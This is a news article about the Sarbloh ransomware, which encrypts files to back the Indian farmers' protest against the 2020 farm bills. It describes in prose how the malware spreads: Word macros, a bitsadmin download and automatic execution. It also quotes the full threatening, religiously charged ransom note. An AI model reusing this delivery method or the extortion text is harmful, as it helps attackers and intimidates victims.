A newly updated ransomware named Sarbloh that encrypts user files and they will display the message on the user screen that supports the protest of Indian Farmers.

The Indian government issued a new set of rules and regulations and named this as ‘Indian Agriculture Act of 2020’ and also called as Farm Bills. According to the government, these bills are required to modernize the agricultural industry.

Whereas, the Farmers believe that these new laws will make their job more challenging and hurt their livelihoods while generating revenue. This new law removed the restrictions on how the farmers selling the goods at how much they get.

However, as this law was passed in the parliament, thousands of farmers had been protesting against the bill in New Delhi.

Now, read the upcoming section to know why this new ransomware supports the Indian farmers?

Why Sarbloh Supports Indian Farmers?

After the detailed investigation conducted by multiple security firms that include Malwarebytes, Cyble, and QuickHeal this ransomware is named Sarbloh and spreading through Word documents that contain a message in supports of Indian Farmers.

It is still not clear that how the malicious word documents are spreading. However, as the user clicks on it, the user will show a box that prompts to Enable Content to review the data correctly.

As the user hits the button, the malware start downloads a file that is identified as putty.exe and it also uses bitsadmin.exe. The file gets downloaded to the Document folder and then it will be executed automatically. Once the file is completely executed, it will start encrypting the data and rename the encrypted files as .sarbloh.

Once the software completed the encryption it will create a README_SARBLOH.txt file that holds the message and supports the farmers of India.

The message reads as;

YOUR FILES ARE GONE!!!

THEY WILL NOT BE RECOVERABLE UNTIL THE DEMANDS OF THE FARMERS HAVE BEEN MET

WHAT HAPPENED TO THEM?

Using military-grade EnCryPtiOn all the files on your system have been made useless.

India, Sikhs have long been the face against the oppression placed upon them.

Each time we have resisted.

Today you come for the very throats of Hindu, Sikh, and Muslim farmers by trying to take their livelihood.

You will not succeed in your sinister ways.

The two-sided sword of the Khalsa is at any moment’s notice. Tyaar bar tyaar.

Wherever our blood is spilled, the tree of Sikhi uproots from there.

If your intentions for the farmers are pure and

you wish to help them, this is not the way.

Halemi Raj, Sikh Raj, was not this way.

If the laws are not repealed. Your fate is no

different to what the Khalsa did to Sirhind.

Waheguru Ji Ka Khalsa, Waheguru Ji Ki Fateh

Khalsa Cyber Fauj

Summering Up

According to the experts, this campaign was named after the ‘Sarbloh Granth’ a book of scriptures of Sikhism. Whereas Sarbloh is open-source ransomware that is also named Khalsa Crypt and having no known weaknesses yet. But multiple experts think that this new malware doesn’t remove shadow volume, therefore it will easier to remove this from the victim’s system.